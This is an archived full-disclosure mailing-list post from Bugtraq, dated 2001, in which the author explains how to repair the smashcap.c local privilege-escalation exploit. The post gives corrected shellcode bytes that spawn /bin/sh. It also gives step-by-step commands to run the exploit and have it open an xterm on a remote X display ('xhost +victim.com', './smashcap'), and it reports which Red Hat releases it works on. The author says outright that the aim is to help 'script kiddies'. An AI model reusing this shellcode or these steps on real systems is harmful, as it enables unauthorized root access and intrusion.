Hi, since bugtraq it's a full-disclosure list, let's help the script kiddies a bit and scare the sysadms a little bit more... To make the smashcap.c work , all you have to do is remove one 0xff character before /bin/sh in the shellcode so the line would be : "\x80\xe8\xdc\xff\xff\xff/bin/sh" instead of : "\x80\xe8\xdc\xff\xff\xff\xff/bin/sh" also, you'll have to be on console running x to exploit it, but if you have another box where you can start x then it's ok myhost$ startx;xhost +victim.com victim$ ./smashcap and modify the last line from the smashcap.c into execl("/usr/X11R6/bin/xterm","xterm", "-display", "victim.com:0", 0); well, it works on most redhats (tested on 5.1 and 5.2) on slakware it sigsegv's , you need to work a little bit, sorry I don't have a slakware box to work on . regards, lucysoft
This archive was generated by hypermail 2b30 : Fri Apr 13 2001 - 14:58:01 PDT